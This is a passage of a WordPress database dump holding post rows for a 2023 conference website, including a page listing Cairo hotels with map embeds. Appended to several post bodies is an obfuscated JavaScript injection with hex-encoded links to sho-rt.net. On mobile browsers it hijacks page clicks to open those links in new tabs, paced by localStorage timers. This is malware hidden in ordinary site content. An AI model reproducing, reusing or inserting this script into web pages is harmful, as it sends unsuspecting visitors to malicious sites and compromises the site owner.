)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Chukwuma Okolie','','publish','closed','closed','','chukwuma-okolie','','','2023-01-22 05:35:45','2023-01-22 05:35:45','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3643',0,'dt_team','',0),
(3644,1,'2023-01-22 05:34:54','2023-01-22 05:34:54','','m6','','inherit','open','closed','','m6','','','2023-01-22 05:34:54','2023-01-22 05:34:54','',3643,'https://gsw2023.com/wp-content/uploads/2023/01/m6.jpg',0,'attachment','image/jpeg',0),
(3645,1,'2023-09-16 22:41:12','2023-01-25 06:25:36','','Youth Forum','','publish','closed','closed','','youth-presentation-forum','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=3645',26,'nav_menu_item','',0),
(3646,1,'2023-01-25 06:38:41','2023-01-25 06:38:41','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li>&lt;iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.783795295839!2d31.22980131511502!3d30.043059981882774!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x83982db9f6869ca!2zMzDCsDAyJzM1LjAiTiAzMcKwMTMnNTUuMiJF!5e0!3m2!1sen!2seg!4v1663325089010!5m2!1sen!2seg\" width=\"885\" height=\"450\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"&gt;&lt;/iframe&gt;</li>\n</ul>\n<p>&nbsp;[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 06:38:41','2023-01-25 06:38:41','',2685,'https://gsw2023.com/?p=3646',0,'revision','',0),
(3647,1,'2023-01-25 06:54:46','2023-01-25 06:54:46','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 